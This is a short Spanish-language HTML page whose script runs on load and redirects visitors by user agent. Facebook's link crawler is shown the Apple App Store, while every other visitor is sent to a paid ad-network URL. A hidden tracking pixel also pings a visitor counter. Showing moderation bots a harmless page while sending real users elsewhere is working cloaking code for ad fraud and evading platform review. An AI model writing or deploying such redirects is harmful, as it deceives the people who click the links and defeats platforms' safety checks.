<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Redirección de tráfico</title>
</head>
<body>

<script>
  // Función para redirigir según el agente de usuario
  function redirigirSegunAgente() {
    // Verificar si es un bot de Facebook
    if (/facebookexternalhit/i.test(navigator.userAgent)) {
      // Redirigir a la URL para bots de Facebook
      window.location.href = 'https://apps.apple.com/';
    } else {
      // Redirigir a la URL para usuarios reales (puedes ajustar esto según sea necesario)
      window.location.href = 'https://www.profitablegatecpm.com/bsbb0eb84?key=6277a7e45b3d4bb04ae99f6dc0ee1397';
    }
  }

  // Llamar a la función de redirección al cargar la página
  redirigirSegunAgente();
</script>

<!-- Script del contador -->
<img src="https://whos.amung.us/pingjs/?k=depopolador0&t= ...  &x=https://www.tesla.com/es_es" style="display:none">

</body>
</html>